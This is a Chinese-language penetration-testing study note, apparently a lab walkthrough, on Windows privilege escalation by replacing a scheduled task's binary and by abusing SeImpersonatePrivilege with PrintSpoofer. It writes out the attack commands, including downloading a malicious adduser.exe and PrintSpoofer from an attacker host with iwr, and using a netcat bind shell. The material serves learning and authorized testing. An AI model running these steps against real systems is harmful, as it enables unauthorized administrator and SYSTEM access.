小白渗透工作理解第八篇——Windows提权（四）Windows组件

声明：本文内容来源于网络，如有侵权请联系作者进行删除！！！

目录

声明：本文内容来源于网络，如有侵权请联系作者进行删除！！！

一、计划任务

案例演示

二、使用漏洞（PrintSpoofer）

案例分析

---

一、计划任务

       Windows使用任务计划程序执行各种自动化任务，例如清理活动或更新管理。在Windows上，他们称为“计划任务”或“任务”，定义为“或”更多触发器。触发器用作条件，导致一个或多个满足时应执行的操作。例如，可以设置触发器设置为特定的时间和日期、启动时、登录时或Windows上事件。操作指定要执行的程序或脚本。那里是用于任务的各种其他可能配置，在任务的“条件”、“设置”和“常规”菜单选项卡中财产。

以哪个用户帐户（主体）的身份执行此任务？

        第一个问题帮助我们理解滥用任务是否会最终导致特权升级。如果任务被执行在我们当前用户的背景下，它不会导致我们提高特权但是，如果任务以NT AUTHORITY\SYSTEM或作为管理用户，那么成功的攻击可能会导致我们特权升级。

为任务指定了哪些触发器？

      第二个问题很重要，因为如果过去满足触发条件，则该任务将来不会再次运行，因此对我们来说不是一个可行的目标。此外，如果我们正在进行为期一周的渗透测试，但任务在此时间之后运行，我们应该寻找另一个权限升级向量。然而，我们会在客户的渗透测试报告中提及这一发现。

当满足一个或多个触发器时，将执行哪些操作？

       第三个问题的答案决定了我们如何执行潜在的特权升级。在大多数情况下，我们可以利用熟悉的策略，例如替换二进制文件或放置丢失的 DLL，就像我们在之前的学习单元中对服务所做的那样。虽然我们没有包含计划任务的服务二进制文件，但我们有由操作指定的程序和脚本。

案例演示

        我们尝试通过替换操作中指定的二进制文件来提升权限。为此，我们将使用 RDP 以steve（密码 securityIsNotAnOption++++++ ）身份再次连接到 CLIENTWK220 并启动 PowerShell 窗口。

查找计划任务

        我们可以使用Get-ScheduledTask 1 Cmdlet 或命令 schtasks /query在 Windows 上查看计划任务 。我们将在本示例中使用后者来查看 CLIENTWK220 上的所有计划任务。我们输入/fo 以LIST作为参数，以指定输出格式为列表。此外，我们添加/v来显示任务的所有属性。

        执行命令后，我们会获得大量输出，其中包含有关系统上所有计划任务的信息。我们应该在Author、TaskName、Task To Run、 Run As User和Next Run Time字段中寻找有趣的信息。。

命令：

schtasks /query /fo LIST /v

权限分析

        由于可执行文件BackendCacheCleanup.exe位于在steve的home目录的子目录中，我们应该有广泛的权限。让我们检查一下我们对这个文件的权限用icacls。

命令：

icacls C:\Users\steve\Pictures\BackendCacheCleanup.exe

        正如预期的那样，我们拥有完全访问（F）权限，因为可执行文件在steve的主目录中。现在，我们可以用我们的二进制adduser.exe中指定的可执行文件替换计划任务的操作。

替换恶意程序

        为此，我们将启动一个Python3 Web服务器来服​务我们的交叉编译文件，adduser.exe，并使用iwr将其下载到CLIENTWK220。我们还将复制原始BackendCacheCleanup.exe，以便我们可以在我们的权限提升攻击成功后恢复它。

命令：

iwr -Uri http://192.168.119.3/adduser.exe -Outfile BackendCacheCleanup.exemove .\Pictures\BackendCacheCleanup.exe BackendCacheCleanup.exe.bakmove .\BackendCacheCleanup.exe .\Pictures\

成功执行

        再次执行计划任务后，应创建dave2并添加到本地管理员组。等了一分钟我们可以检查特权提升攻击是否成功。

命令：

net usernet localgroup administrators

        显示我们成功地替换了计划任务用来创建我们控制其凭据的管理用户。

二、使用漏洞（PrintSpoofer）

案例分析

权限分析

我们使用whoami /priv以显示Dave的分配权限。

命令：

nc 192.168.50.220 4444whoami /priv

下载利用程序

        显示dave拥有特权已分配SeImpersonatePrivilege。因此，我们可以尝试使用PrintSpoofer提升我们的权限。我们再开一个终端选项卡，下载此工具的64位版本，并使用Python3 Web服务器。

命令：

wget https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer64.exepython3 -m http.server 80

        在具有活动绑定shell的终端选项卡中，我们将启动一个PowerShell会话并使用iwr下载PrintSpoofer64.exe我们的kali。

命令：

Powershelliwr -uri http://192.168.119.2/PrintSpoofer64.exe -Outfile PrintSpoofer64.exe

执行漏洞程序

        在上下文中获取交互式PowerShell会话NT AUTHORITY\SYSTEM与PrintSpoofer64.exe，我们将输入powershell.exe作为-c的参数来指定命令web要执行和-i与当前中的进程交互命令提示符。

命令：

.\PrintSpoofer64.exe -i -c powershell.exewhoami

        我们成功地使用PrintSpoofer进行了权限提升攻击引导我们进入一个在用户帐户NT AUTHORITY\SYSTEM。